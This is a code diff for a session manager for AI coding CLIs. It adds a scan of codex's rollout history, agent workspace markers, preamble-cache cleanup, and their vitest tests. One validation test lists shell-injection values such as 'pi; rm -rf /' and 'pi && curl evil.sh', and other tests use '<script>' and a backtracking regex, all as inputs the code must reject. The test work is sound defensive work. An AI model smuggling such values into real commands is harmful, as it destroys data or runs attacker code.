claudeSessionId: p.resumeSessionId || p.codexConfig?.resumeSessionId,
pinned: p.pinned,
pinnedAt: p.pinnedAt,
}));
@@ -4213,6 +4269,49 @@ export function registerSessionRoutes(
// Best-effort, same as the claude scan above.
}
// Codex's own rollout store (~/.codex/sessions) — the same treatment omp
// gets above, and for the same reason: codex writes no Claude transcript, so
// without this a codex conversation disappears from the list as soon as its
// session record does. `resumeId` is the rollout's own thread id, which is
// what `codex resume` takes; see codex-transcript.ts.
try {
const codexRows = await scanCodexSessionsHistory();
for (const h of codexRows) {
history.push({
sessionId: h.sessionId,
workingDir: h.workingDir,
sizeBytes: h.sizeBytes,
lastModified: h.lastModified,
firstPrompt: h.firstPrompt,
lastPrompt: h.lastPrompt,
mode: 'codex',
resumeId: h.sessionId,
});
}
// Fold a FRESH codex pane into its own rollout row. A resumed one already
// folds, because Session sets `claudeSessionId` from the resume id it was
// given; a fresh one has no thread id until codex writes the rollout, so
// the link has to come from the other side. Codeman spawns every codex pane
// with CODEX_INTERNAL_ORIGINATOR_OVERRIDE=codeman_<sessionId>, and codex
// stamps that into session_meta.originator, so the rollout names the pane.
//
// Newest rollout wins: `/new` typed inside the TUI leaves several rollouts
// carrying the same originator, and the pane is on the most recent one.
// Rows arrive newest-first, so the first match is it.
//
// Never overwrites an id a session already knows — that one came from the
// resume path and is authoritative.
const codexThreads = codexThreadBySessionId(codexRows);
for (const row of [...live, ...persisted]) {
if (row.claudeSessionId && row.claudeSessionId !== row.id) continue;
const threadId = codexThreads.get(row.id);
if (threadId) row.claudeSessionId = threadId;
}
} catch {
// Best-effort, same as the two scans above.
}
// Mux process stats (best-effort; guard against mocks lacking the method).
let mux: MuxStatInput[] = [];
try {
+10
View File
@@ -1025,6 +1025,16 @@ export const QuickStartSchema = z.object({
envOverrides: safeEnvOverridesSchema,
/** Claude CLI effort level (soft default via --settings, switchable in-session via /effort) */
effort: effortLevelSchema,
/**
* Who is spawning this worker (`codeman-skill` from the packaged agent skill), or,
* equivalently, the `X-Codeman-Agent-Origin` header; the body wins when both are
* present. Used ONLY to label a case directory this request CREATES as an agent
* scratch workspace, so it can be found and cleaned up later — see
* `src/agent-case-marker.ts`. Never a permission signal, and an unrecognised token
* is dropped rather than rejected. `POST /api/sessions` has no equivalent field
* because it takes an existing `workingDir` and so never creates a directory to label.
*/
agentOrigin: z.string().max(64).optional(),
});
// ========== Hook Events ==========
+20 -1
View File
@@ -81,7 +81,7 @@ import { RunSummaryTracker } from '../run-summary.js';
import { PlanOrchestrator } from '../plan-orchestrator.js';
import { OrchestratorLoop } from '../orchestrator-loop.js';
import { getLifecycleLog } from '../session-lifecycle-log.js';
import { applyWorkspaceHooks } from '../hooks-config.js';
import { applyWorkspaceHooks, pruneAgentSessionPreambles, removeAgentSessionPreamble } from '../hooks-config.js';
import { PushSubscriptionStore } from '../push-store.js';
import webpush from 'web-push';
import { SseStreamManager } from './sse-stream-manager.js';
@@ -1370,6 +1370,12 @@ export class WebServer extends EventEmitter {
// Best-effort cleanup
}
}
// Drop the agent skill's preamble cache for this session (seeded at create).
// killMux only: a detach leaves the session recoverable, and its agent would
// come back to a loader whose file we deleted.
if (killMux) {
void removeAgentSessionPreamble(sessionId);
}
await session.stop(killMux);
this.sessions.delete(sessionId);
// Only remove from state.json if we're also killing the mux session.
@@ -2514,6 +2520,19 @@ export class WebServer extends EventEmitter {
}
}
// Sweep agent preamble caches whose sessions are gone (see
// pruneAgentSessionPreambles). Once per boot, after restore, so every session this
// instance owns is in the keep set. Best-effort and off the startup critical path.
if (!this.testMode) {
void pruneAgentSessionPreambles(this.sessions.keys())
.then((removed) => {
if (removed > 0) console.log(`[agent-skill] pruned ${removed} stale preamble cache file(s)`);
})
.catch(() => {
/* best-effort */
});
}
// Bound disk use under heavy paste-image traffic: delete `paste-*` files
// older than 7 days from each live session's .claude-images/ hourly.
if (!this.testMode) {
+140
View File
@@ -0,0 +1,140 @@
/**
* @fileoverview The agent-case marker: the label that tells a scratch worker workspace
* apart from the user's real projects.
*
* The rules under test are the ones that keep a cleanup affordance safe: reading is
* total (anything that is not a well-formed version-1 marker reads as "not
* agent-created", never as a half-trusted entry), the origin token is allowlisted
* rather than escaped at each use, and writing never throws — a failed marker must not
* fail the worker spawn it decorates.
*
* Port: N/A (pure + a temp dir).
*/
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
import { mkdtemp, rm, readFile, writeFile } from 'node:fs/promises';
import { join } from 'node:path';
import { tmpdir } from 'node:os';
import {
AGENT_CASE_MARKER_FILE,
AGENT_ORIGIN_CODEMAN_SKILL,
AGENT_ORIGIN_SPAWNED_BY_SESSION,
buildAgentCaseMarker,
normalizeAgentOrigin,
parseAgentCaseMarker,
readAgentCaseMarker,
writeAgentCaseMarker,
} from '../src/agent-case-marker.js';
describe('normalizeAgentOrigin', () => {
it('accepts a short lowercase token', () => {
expect(normalizeAgentOrigin('codeman-skill')).toBe('codeman-skill');
expect(normalizeAgentOrigin(' Codeman-Skill ')).toBe('codeman-skill');
expect(normalizeAgentOrigin('agent.v2_1')).toBe('agent.v2_1');
});
it('drops anything that is not one', () => {
// The value reaches a JSON file and the case-manage UI, so it is allowlisted at
// the boundary instead of escaped at every use site.
expect(normalizeAgentOrigin('<script>')).toBeUndefined();
expect(normalizeAgentOrigin('has space')).toBeUndefined();
expect(normalizeAgentOrigin('-leading-dash')).toBeUndefined();
expect(normalizeAgentOrigin('x'.repeat(33))).toBeUndefined();
expect(normalizeAgentOrigin('')).toBeUndefined();
expect(normalizeAgentOrigin(undefined)).toBeUndefined();
expect(normalizeAgentOrigin(42)).toBeUndefined();
});
});
describe('buildAgentCaseMarker', () => {
it('keeps only the fields that were supplied', () => {
const marker = buildAgentCaseMarker({ createdBy: AGENT_ORIGIN_CODEMAN_SKILL });
expect(marker.version).toBe(1);
expect(marker.createdBy).toBe(AGENT_ORIGIN_CODEMAN_SKILL);
expect(Date.parse(marker.createdAt)).not.toBeNaN();
expect('parentSessionId' in marker).toBe(false);
expect('mode' in marker).toBe(false);
});
it('falls back to the spawned-by-session origin rather than storing junk', () => {
expect(buildAgentCaseMarker({ createdBy: 'not a token' }).createdBy).toBe(AGENT_ORIGIN_SPAWNED_BY_SESSION);
});
});
describe('parseAgentCaseMarker', () => {
const valid = JSON.stringify({
version: 1,
createdAt: '2026-09-07T10:00:00.000Z',
createdBy: 'codeman-skill',
parentSessionId: 'sess-1',
parentSessionName: 'w1-claudeman',
mode: 'claude',
note: 'ignored',
});
it('round-trips a well-formed marker and drops unknown fields', () => {
const marker = parseAgentCaseMarker(valid);
expect(marker).toEqual({
version: 1,
createdAt: '2026-09-07T10:00:00.000Z',
createdBy: 'codeman-skill',
parentSessionId: 'sess-1',
parentSessionName: 'w1-claudeman',
mode: 'claude',
});
});
it('reads anything malformed as absent', () => {
// Each of these must mean "not an agent case", because the answer drives a
// recursive-delete affordance in the UI.
expect(parseAgentCaseMarker('not json')).toBeNull();
expect(parseAgentCaseMarker('[]')).toBeNull();
expect(parseAgentCaseMarker('null')).toBeNull();
expect(parseAgentCaseMarker(JSON.stringify({ version: 2, createdAt: '2026-09-07', createdBy: 'x' }))).toBeNull();
expect(parseAgentCaseMarker(JSON.stringify({ version: 1, createdBy: 'x' }))).toBeNull();
expect(parseAgentCaseMarker(JSON.stringify({ version: 1, createdAt: 'whenever', createdBy: 'x' }))).toBeNull();
expect(
parseAgentCaseMarker(JSON.stringify({ version: 1, createdAt: '2026-09-07T10:00:00Z', createdBy: 'bad token' }))
).toBeNull();
});
});
describe('writeAgentCaseMarker / readAgentCaseMarker', () => {
let caseDir: string;
beforeEach(async () => {
caseDir = await mkdtemp(join(tmpdir(), 'codeman-agent-case-'));
});
afterEach(async () => {
await rm(caseDir, { recursive: true, force: true });
});
it('round-trips through the case directory', async () => {
const marker = buildAgentCaseMarker({
createdBy: AGENT_ORIGIN_CODEMAN_SKILL,
parentSessionId: 'sess-1',
mode: 'claude',
});
expect(await writeAgentCaseMarker(caseDir, marker)).toBe(true);
expect(await readAgentCaseMarker(caseDir)).toEqual(marker);
});
it('writes a note explaining the file to whoever finds it', async () => {
await writeAgentCaseMarker(caseDir, buildAgentCaseMarker({ createdBy: AGENT_ORIGIN_CODEMAN_SKILL }));
const raw = JSON.parse(await readFile(join(caseDir, AGENT_CASE_MARKER_FILE), 'utf-8'));
expect(raw.note).toContain('Delete this file');
});
it('reports failure instead of throwing when the directory is missing', async () => {
// Best-effort by design: a marker that cannot be written must not fail the spawn.
const written = await writeAgentCaseMarker(join(caseDir, 'nope'), buildAgentCaseMarker({ createdBy: 'x-agent' }));
expect(written).toBe(false);
});
it('reads an absent or corrupt marker as not-agent-created', async () => {
expect(await readAgentCaseMarker(caseDir)).toBeNull();
await writeFile(join(caseDir, AGENT_CASE_MARKER_FILE), '{ truncated', 'utf-8');
expect(await readAgentCaseMarker(caseDir)).toBeNull();
});
});
+67 -1
View File
@@ -11,7 +11,7 @@
*/
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
import { mkdtemp, rm, mkdir, writeFile, readFile, symlink, readdir, stat } from 'node:fs/promises';
import { mkdtemp, rm, mkdir, writeFile, readFile, symlink, readdir, stat, utimes } from 'node:fs/promises';
import { existsSync } from 'node:fs';
import { join } from 'node:path';
import { tmpdir, homedir } from 'node:os';
@@ -21,10 +21,25 @@ import {
removeAgentSkillFrom,
refreshUserAgentSkill,
seedAgentSessionPreamble,
removeAgentSessionPreamble,
pruneAgentSessionPreambles,
} from '../src/hooks-config.js';
const MARKER_PREFIX = '<!-- codeman-managed-agent-skill';
/** Run `fn` against a throwaway XDG cache dir, restoring the env afterwards. */
async function withCacheDir(fn: (cacheDir: string) => Promise<void>): Promise<void> {
const prevXdg = process.env.XDG_CACHE_HOME;
const cacheDir = join(casePath, 'xdg-cache');
process.env.XDG_CACHE_HOME = cacheDir;
try {
await fn(cacheDir);
} finally {
if (prevXdg === undefined) delete process.env.XDG_CACHE_HOME;
else process.env.XDG_CACHE_HOME = prevXdg;
}
}
let casePath: string;
const skillDir = () => join(casePath, '.claude', 'skills', 'codeman');
@@ -165,6 +180,57 @@ describe('preamble single-source (seed + §0 heredoc parity)', () => {
}
});
it('removeAgentSessionPreamble drops one session cache and shrugs at a missing one', async () => {
// Seeding writes one file per claude session and nothing used to remove them
// (236 leftovers measured on a working machine); session teardown calls this.
await withCacheDir(async (cacheDir) => {
await seedAgentSessionPreamble('gone-session');
expect(existsSync(join(cacheDir, 'codeman-agent-gone-session.sh'))).toBe(true);
await removeAgentSessionPreamble('gone-session');
expect(existsSync(join(cacheDir, 'codeman-agent-gone-session.sh'))).toBe(false);
await expect(removeAgentSessionPreamble('never-existed')).resolves.toBeUndefined();
});
});
it('pruneAgentSessionPreambles takes only aged caches with no live session behind them', async () => {
await withCacheDir(async (cacheDir) => {
const aged = (name: string) => join(cacheDir, name);
for (const id of ['live-old', 'dead-old', 'dead-fresh']) {
await seedAgentSessionPreamble(id);
}
// Age two of them past the cutoff; `dead-fresh` stays new.
const old = new Date(Date.now() - 30 * 24 * 60 * 60 * 1000);
await utimes(aged('codeman-agent-live-old.sh'), old, old);
await utimes(aged('codeman-agent-dead-old.sh'), old, old);
// An unrelated file in the same cache dir must be invisible to the sweep.
await writeFile(aged('someone-elses-file.sh'), 'not ours\n');
const removed = await pruneAgentSessionPreambles(['live-old']);
expect(removed).toBe(1);
expect(existsSync(aged('codeman-agent-dead-old.sh'))).toBe(false);
// A live session's cache is load-bearing: the skill's two-line loader reads it
// mid-run, so age alone must never take it.
expect(existsSync(aged('codeman-agent-live-old.sh'))).toBe(true);
// And a recently-seeded one belongs to a session this process may not know about.
expect(existsSync(aged('codeman-agent-dead-fresh.sh'))).toBe(true);
expect(existsSync(aged('someone-elses-file.sh'))).toBe(true);
});
});
it('pruneAgentSessionPreambles reports 0 rather than throwing when there is no cache dir', async () => {
const prevXdg = process.env.XDG_CACHE_HOME;
process.env.XDG_CACHE_HOME = join(casePath, 'no-such-cache');
try {
expect(await pruneAgentSessionPreambles([])).toBe(0);
} finally {
if (prevXdg === undefined) delete process.env.XDG_CACHE_HOME;
else process.env.XDG_CACHE_HOME = prevXdg;
}
});
it('seedAgentSessionPreamble falls back to ~/.cache when XDG_CACHE_HOME is unset', async () => {
const prevXdg = process.env.XDG_CACHE_HOME;
delete process.env.XDG_CACHE_HOME;
+29
View File
@@ -17,6 +17,7 @@
import { describe, it, expect } from 'vitest';
import { CliEntrySchema } from '../src/config/cli-registry/schema.js';
import { compileVersionRegex } from '../src/config/cli-registry/patterns.js';
import { STOCK_CLIS } from '../src/config/cli-registry/stock.js';
import type { CliEntry } from '../src/config/cli-registry/types.js';
@@ -75,6 +76,34 @@ describe('strictness', () => {
});
});
describe('workDetect.workingLine is guarded like every other config regex', () => {
it('rejects a nested quantifier', () => {
expectRejected((e) => {
(e.capabilities as Record<string, unknown>).workDetect = { promptGlyph: '>', workingLine: '(a+)+b' };
}, 'this pattern is compiled once and then run against every accumulated PTY chunk, so catastrophic backtracking here freezes the event loop for the whole server');
});
it('rejects a source longer than compileVersionRegex() will compile', () => {
expectRejected((e) => {
(e.capabilities as Record<string, unknown>).workDetect = { promptGlyph: '>', workingLine: 'a'.repeat(201) };
}, 'the schema must not accept a pattern the runtime will then refuse to compile, or the CLI silently falls back to the Claude pattern');
});
it('rejects a pattern that is not a regex at all', () => {
expectRejected((e) => {
(e.capabilities as Record<string, unknown>).workDetect = { promptGlyph: '>', workingLine: '([unclosed' };
}, 'a broken pattern must fail at LOAD time, not inside the PTY data handler');
});
it('accepts both shipped patterns unchanged', () => {
for (const entry of STOCK_CLIS) {
const src = entry.capabilities.workDetect?.workingLine;
if (!src) continue;
expect(compileVersionRegex(src), `${entry.id} declares a workingLine the guard refuses`).not.toBeNull();
}
});
});
describe('no shell text can reach the command line', () => {
it('rejects a literal carrying shell metacharacters', () => {
for (const evil of ['pi; rm -rf /', 'pi && curl evil.sh', 'pi`whoami`', 'pi $(id)', 'pi | tee', 'pi > /etc/x']) {
@@ -0,0 +1,82 @@
/**
* @fileoverview A resumed codex session must keep its thread-id alias across
* `start()`, not just at construction.
*
* `claudeSessionId` doubles as the generic "external transcript id" the unified
* list folds a Past-Sessions row into its owning session by. For codex that id
* is the rollout's thread id, and losing it is not cosmetic: the stale row stays
* in PAST and still resumes, so clicking it starts a SECOND `codex resume` on a
* thread already open in the live pane.
*
* The bug this pins: the alias was wired into the constructor only. `start()`
* recomputes `claudeSessionId` at two further points — the mux branch and the
* unconditional "third reset point" that runs after both the mux and direct-PTY
* paths — and both listed only Claude's `resumeSessionId` and omp's. For codex
* both are undefined, so every mux reattach and every boot recovery reset the
* alias back to the Codeman id and the duplicate came back. The existing comment
* at the third reset point already warned that omitting omp's fallback there
* "stomps the mux branch's correctly-resolved OMP alias"; codex needed the same.
*
* Mirrors `test/omp-fresh-run-no-resume.test.ts`, which drives a real `Session`
* against the in-memory tmux layer that vitest substitutes.
*/
import { mkdirSync, rmSync } from 'node:fs';
import { homedir } from 'node:os';
import { join } from 'node:path';
import { afterEach, describe, expect, it } from 'vitest';
import { Session } from '../src/session.js';
import { TmuxManager } from '../src/tmux-manager.js';
describe('codex: a resumed thread id survives start()', () => {
const workingDir = join(homedir(), 'codeman-cases', 'codex-resume-alias');
const THREAD_ID = '01a060f0-0361-7f91-abde-b283020db0d7';
const sessions: Session[] = [];
afterEach(() => {
for (const s of sessions.splice(0)) s.stop();
rmSync(workingDir, { recursive: true, force: true });
});
function makeSession(useMux: boolean): Session {
mkdirSync(workingDir, { recursive: true });
const session = new Session({
workingDir,
mode: 'codex',
codexConfig: { resumeSessionId: THREAD_ID },
mux: new TmuxManager(),
useMux,
});
sessions.push(session);
return session;
}
it('carries the thread id from construction', () => {
expect(makeSession(true).claudeSessionId).toBe(THREAD_ID);
});
it('still carries it after starting under mux', async () => {
const session = makeSession(true);
await session.startInteractive();
expect(session.claudeSessionId).toBe(THREAD_ID);
});
it('refuses to start without mux at all, so the mux path is the only one to cover', async () => {
// codex declares `requiresMux`, so there is no direct-PTY codex session for
// the third reset point to run against on its own — the assertion above is
// the whole surface.
await expect(makeSession(false).startInteractive()).rejects.toThrow(/require tmux/i);
});
it('a fresh codex session keeps the Codeman id, having no thread of its own', async () => {
mkdirSync(workingDir, { recursive: true });
const session = new Session({ workingDir, mode: 'codex', mux: new TmuxManager(), useMux: true });
sessions.push(session);
await session.startInteractive();
// Nothing to alias to yet — codex has not written the rollout. Such a
// session is folded from the other side, by originator (codexThreadBySessionId).
expect(session.claudeSessionId).toBe(session.id);
});
});
+304
View File
@@ -0,0 +1,304 @@
/**
* Reading codex's own rollout store for Past Sessions rows.
*
* Three of these assertions exist because the obvious implementation was
* measured to be wrong against real files (codex CLI 0.152.1):
*
* - codex 0.152.1 emits NO `event_msg`/`user_message` rows at all. It writes
* `event_msg`/`item_completed` carrying an `item.type` of `UserMessage`
* instead, so a scanner that knew only the older shape found a prompt for
* July rollouts and nothing for September ones.
* - the `response_item` fallback sees codex's injected context, and on a real
* store the FIRST such row is the repository's AGENTS.md every time. Taking
* it literally titled every row with the same instructions block.
* - codex spawns sub-agent threads into the same store, stamped
* `thread_source: 'subagent'`. On the store this was built against they
* outnumbered the threads a person can actually resume.
*/
import { describe, expect, it, beforeEach, afterEach } from 'vitest';
import { appendFile, mkdtemp, mkdir, writeFile, rm, utimes } from 'node:fs/promises';
import { join } from 'node:path';
import { tmpdir } from 'node:os';
import {
scanCodexSessionsHistory,
codexThreadBySessionId,
__clearCodexIdentityCache,
} from '../src/codex-transcript.js';
let home: string;
let prevCodexHome: string | undefined;
/** A rollout's opening line, as codex writes it. */
const sessionMeta = (opts: { id: string; cwd?: string; threadSource?: string; originator?: string }) =>
JSON.stringify({
timestamp: '2026-09-02T07:05:37.421Z',
type: 'session_meta',
payload: {
id: opts.id,
session_id: opts.id,
...(opts.cwd ? { cwd: opts.cwd } : {}),
originator: opts.originator ?? 'codex-tui',
...(opts.threadSource ? { thread_source: opts.threadSource } : {}),
// The real thing embeds full base instructions here; padded so the file
// clears the size floor and exercises the head window.
base_instructions: { text: 'x'.repeat(500) },
},
});
/** codex 0.152.1's user-input row. */
const itemCompletedUser = (text: string) =>
JSON.stringify({
type: 'event_msg',
payload: { type: 'item_completed', item: { type: 'UserMessage', id: 'i1', content: [{ type: 'text', text }] } },
});
/** The shape older codex versions wrote. */
const legacyUserMessage = (text: string) =>
JSON.stringify({ type: 'event_msg', payload: { type: 'user_message', message: text } });
/** The last-resort shape, which also carries codex's injected context. */
const responseItemUser = (text: string) =>
JSON.stringify({ type: 'response_item', payload: { role: 'user', content: [{ type: 'text', text }] } });
async function writeRollout(id: string, lines: string[], mtime?: Date): Promise<string> {
const dir = join(home, 'sessions', '2026', '09', '02');
await mkdir(dir, { recursive: true });
const path = join(dir, `rollout-2026-09-02T09-05-37-${id}.jsonl`);
await writeFile(path, lines.join('\n') + '\n', 'utf-8');
if (mtime) await utimes(path, mtime, mtime);
return path;
}
beforeEach(async () => {
home = await mkdtemp(join(tmpdir(), 'codex-transcript-'));
prevCodexHome = process.env.CODEX_HOME;
process.env.CODEX_HOME = home;
__clearCodexIdentityCache();
});
afterEach(async () => {
if (prevCodexHome === undefined) delete process.env.CODEX_HOME;
else process.env.CODEX_HOME = prevCodexHome;
await rm(home, { recursive: true, force: true });
});
describe('scanCodexSessionsHistory', () => {
it('returns nothing when the store does not exist', async () => {
process.env.CODEX_HOME = join(home, 'nope');
expect(await scanCodexSessionsHistory()).toEqual([]);
});
it('reads the thread id, working directory and opening prompt', async () => {
await writeRollout('01a060f0-0361-7f91-abde-b283020db0d7', [
sessionMeta({ id: '01a060f0-0361-7f91-abde-b283020db0d7', cwd: '/repo/one' }),
itemCompletedUser('Continue the audit log architecture'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows).toHaveLength(1);
expect(rows[0].sessionId).toBe('01a060f0-0361-7f91-abde-b283020db0d7');
expect(rows[0].workingDir).toBe('/repo/one');
expect(rows[0].firstPrompt).toBe('Continue the audit log architecture');
expect(rows[0].sizeBytes).toBeGreaterThan(0);
});
it('still reads the prompt shape older codex versions wrote', async () => {
await writeRollout('11111111-1111-7111-8111-111111111111', [
sessionMeta({ id: '11111111-1111-7111-8111-111111111111', cwd: '/repo/two' }),
legacyUserMessage('$pr-review-comment-fixer 349'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].firstPrompt).toBe('$pr-review-comment-fixer 349');
});
it('skips injected context when only the fallback shape is present', async () => {
await writeRollout('22222222-2222-7222-8222-222222222222', [
sessionMeta({ id: '22222222-2222-7222-8222-222222222222', cwd: '/repo/three' }),
responseItemUser('# AGENTS.md instructions for /repo/three\n<INSTRUCTIONS> ...'),
responseItemUser('<environment_context>cwd=/repo/three</environment_context>'),
responseItemUser('Replace PanicOnError with Require().NoError'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].firstPrompt).toBe('Replace PanicOnError with Require().NoError');
});
it('prefers a real user row over the injection-prone fallback', async () => {
await writeRollout('33333333-3333-7333-8333-333333333333', [
sessionMeta({ id: '33333333-3333-7333-8333-333333333333', cwd: '/repo/four' }),
responseItemUser('Some earlier response_item row'),
itemCompletedUser('The prompt the user actually typed'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].firstPrompt).toBe('The prompt the user actually typed');
});
it('leaves out sub-agent threads, which nobody resumes', async () => {
await writeRollout('44444444-4444-7444-8444-444444444444', [
sessionMeta({ id: '44444444-4444-7444-8444-444444444444', cwd: '/repo/five' }),
itemCompletedUser('a real conversation'),
]);
await writeRollout('55555555-5555-7555-8555-555555555555', [
sessionMeta({ id: '55555555-5555-7555-8555-555555555555', cwd: '/repo/five', threadSource: 'subagent' }),
itemCompletedUser('work codex gave itself'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows.map((r) => r.sessionId)).toEqual(['44444444-4444-7444-8444-444444444444']);
});
it('reports the most recent prompt as well as the first', async () => {
await writeRollout('66666666-6666-7666-8666-666666666666', [
sessionMeta({ id: '66666666-6666-7666-8666-666666666666', cwd: '/repo/six' }),
itemCompletedUser('the opening question'),
itemCompletedUser('a follow-up'),
itemCompletedUser('the latest thing asked'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].firstPrompt).toBe('the opening question');
expect(rows[0].lastPrompt).toBe('the latest thing asked');
});
it('orders rows newest first', async () => {
await writeRollout(
'77777777-7777-7777-8777-777777777777',
[sessionMeta({ id: '77777777-7777-7777-8777-777777777777', cwd: '/repo/old' }), itemCompletedUser('older')],
new Date('2026-08-01T00:00:00Z')
);
await writeRollout(
'88888888-8888-7888-8888-888888888888',
[sessionMeta({ id: '88888888-8888-7888-8888-888888888888', cwd: '/repo/new' }), itemCompletedUser('newer')],
new Date('2026-09-05T00:00:00Z')
);
const rows = await scanCodexSessionsHistory();
expect(rows.map((r) => r.workingDir)).toEqual(['/repo/new', '/repo/old']);
});
it('ignores a file too short to hold a session_meta line', async () => {
const dir = join(home, 'sessions', '2026', '09', '02');
await mkdir(dir, { recursive: true });
await writeFile(join(dir, 'rollout-2026-09-02T09-05-37-short.jsonl'), '{}\n', 'utf-8');
expect(await scanCodexSessionsHistory()).toEqual([]);
});
it('survives a rollout whose lines are malformed', async () => {
await writeRollout('99999999-9999-7999-8999-999999999999', [
sessionMeta({ id: '99999999-9999-7999-8999-999999999999', cwd: '/repo/seven' }),
'{not json at all',
itemCompletedUser('still found me'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].firstPrompt).toBe('still found me');
});
it('reports the originator, which is how a fresh pane finds its own rollout', async () => {
await writeRollout('bbbbbbbb-bbbb-7bbb-8bbb-bbbbbbbbbbbb', [
sessionMeta({
id: 'bbbbbbbb-bbbb-7bbb-8bbb-bbbbbbbbbbbb',
cwd: '/repo/nine',
originator: 'codeman_2f1c9a44-1111-2222-3333-444455556666',
}),
itemCompletedUser('hello'),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].originator).toBe('codeman_2f1c9a44-1111-2222-3333-444455556666');
});
it('drops a rollout that records no working directory', async () => {
// Emitting workingDir: '' would make a click post an empty directory.
await writeRollout('cccccccc-cccc-7ccc-8ccc-cccccccccccc', [
sessionMeta({ id: 'cccccccc-cccc-7ccc-8ccc-cccccccccccc' }),
itemCompletedUser('nowhere to resume into'),
]);
expect(await scanCodexSessionsHistory()).toEqual([]);
});
it('picks up a prompt written after an earlier scan saw none', async () => {
// The bug this pins: the identity cache was written as soon as the thread id
// was known, but codex writes the first UserMessage only when the user
// submits. Any scan in that window — the home screen, the command palette,
// the search-index refresh — pinned `firstPrompt: undefined` until restart.
const id = 'dddddddd-dddd-7ddd-8ddd-dddddddddddd';
const path = await writeRollout(id, [sessionMeta({ id, cwd: '/repo/ten' })]);
const before = await scanCodexSessionsHistory();
expect(before).toHaveLength(1);
expect(before[0].firstPrompt).toBeUndefined();
await appendFile(path, itemCompletedUser('the prompt, typed a moment later') + '\n', 'utf-8');
const after = await scanCodexSessionsHistory();
expect(after[0].firstPrompt).toBe('the prompt, typed a moment later');
});
it('does not spend the lastPrompt budget on rollouts it never returns', async () => {
// The budget used to count file index, so a store whose newest files are all
// sub-agent threads exhausted it before the first row that needed it.
for (let i = 0; i < 3; i++) {
await writeRollout(
`eeeeeeee-eeee-7eee-8eee-00000000000${i}`,
[
sessionMeta({ id: `eeeeeeee-eeee-7eee-8eee-00000000000${i}`, cwd: '/repo/sub', threadSource: 'subagent' }),
itemCompletedUser('subagent work'),
],
new Date('2026-09-05T00:00:00Z')
);
}
await writeRollout(
'ffffffff-ffff-7fff-8fff-ffffffffffff',
[
sessionMeta({ id: 'ffffffff-ffff-7fff-8fff-ffffffffffff', cwd: '/repo/real' }),
itemCompletedUser('opening'),
itemCompletedUser('the latest thing asked'),
],
new Date('2026-09-04T00:00:00Z')
);
const rows = await scanCodexSessionsHistory();
expect(rows).toHaveLength(1);
expect(rows[0].lastPrompt).toBe('the latest thing asked');
});
it('collapses a long prompt to a single capped line', async () => {
await writeRollout('aaaaaaaa-aaaa-7aaa-8aaa-aaaaaaaaaaaa', [
sessionMeta({ id: 'aaaaaaaa-aaaa-7aaa-8aaa-aaaaaaaaaaaa', cwd: '/repo/eight' }),
itemCompletedUser('line one\nline two\n' + 'y'.repeat(500)),
]);
const rows = await scanCodexSessionsHistory();
expect(rows[0].firstPrompt).not.toContain('\n');
expect(rows[0].firstPrompt!.length).toBeLessThanOrEqual(201);
expect(rows[0].firstPrompt!.endsWith('…')).toBe(true);
});
});
describe('codexThreadBySessionId', () => {
const row = (sessionId: string, originator?: string) =>
({ sessionId, originator, workingDir: '/w', sizeBytes: 1, lastModified: '2026-09-02T00:00:00.000Z' }) as never;
it('maps a Codeman-spawned pane to the thread it is writing', () => {
const map = codexThreadBySessionId([row('thread-a', 'codeman_sess-1')]);
expect(map.get('sess-1')).toBe('thread-a');
});
it('ignores a rollout codex started on its own', () => {
expect(codexThreadBySessionId([row('thread-a', 'codex-tui')]).size).toBe(0);
expect(codexThreadBySessionId([row('thread-a', undefined)]).size).toBe(0);
});
it('keeps the newest rollout when a pane has several', () => {
// `/new` inside the codex TUI leaves the pane's originator on more than one
// rollout; the pane is on the most recent, and rows arrive newest-first.
const map = codexThreadBySessionId([row('thread-new', 'codeman_sess-1'), row('thread-old', 'codeman_sess-1')]);
expect(map.get('sess-1')).toBe('thread-new');
});
});
+4 -2
View File
@@ -397,11 +397,13 @@ describe('Session Manager unified list', () => {
expect(app.selectSession).toHaveBeenCalledWith('sess-alpha');
expect(app.resumeHistorySession).not.toHaveBeenCalled();
// History row → resume by conversation UUID.
// History row → resume by conversation UUID. The trailing `resumeId` is the
// CLI's own thread token, which only a non-claude transcript scanner sets;
// a Claude row carries none, so it arrives undefined here.
const [historyRecord, , historyOptions] = app._buildHistoryItem.mock.calls[1];
expect(historyRecord).toMatchObject({ sessionId: 'conv-uuid-1', sizeBytes: 2048, firstPrompt: 'old prompt' });
historyOptions.onActivate();
expect(app.resumeHistorySession).toHaveBeenCalledWith('conv-uuid-1', '/repo/old', undefined, undefined);
expect(app.resumeHistorySession).toHaveBeenCalledWith('conv-uuid-1', '/repo/old', undefined, undefined, undefined);
});
it('surfaces an error message instead of an empty list when the endpoint fails', async () => {
+184
View File
@@ -0,0 +1,184 @@
/**
* @fileoverview A detached session's pane is sized by its own window, not by
* the dashboard.
*
* One PTY holds one size. When a session is popped out, the dashboard keeps it
* active and keeps measuring it, but the dashboard's terminal is narrower than
* the popup because the session rail takes width the popup does not have. Both
* windows sizing the same pane makes the CLI draw frames that fit neither, and
* the popup shows the result as a garbled frame.
*
* `sendResize` therefore returns early for a session this window has marked
* detached, and the debounced window-resize handler skips it for the same
* reason. A solo window is exempt: it IS the owner. `_maybeRefetchFullHistory`
* already stood aside on the same condition, so this follows a rule the code
* had already established.
*
* Loaded via `vm` with a stubbed context (no jsdom — jsdom is broken on this
* box; see connection-indicator.test.ts), the same way terminal-buffer-flush
* extracts the real mixin methods from terminal-ui.js.
*/
import { readFileSync } from 'node:fs';
import { performance } from 'node:perf_hooks';
import { resolve } from 'node:path';
import vm from 'node:vm';
import { describe, expect, it, vi } from 'vitest';
/** The mixin runs inside the vm context, so its `fetch` must live there too. */
let currentFetch: ReturnType<typeof vi.fn> = vi.fn();
function loadTerminalMixin(): Record<string, unknown> {
const source = readFileSync(resolve(import.meta.dirname, '../src/web/public/terminal-ui.js'), 'utf8');
const FakeCodemanApp = function () {} as unknown as { prototype: Record<string, unknown> };
const context = vm.createContext({
console,
performance,
setTimeout,
clearTimeout,
setInterval: vi.fn(),
clearInterval: vi.fn(),
requestAnimationFrame: vi.fn(),
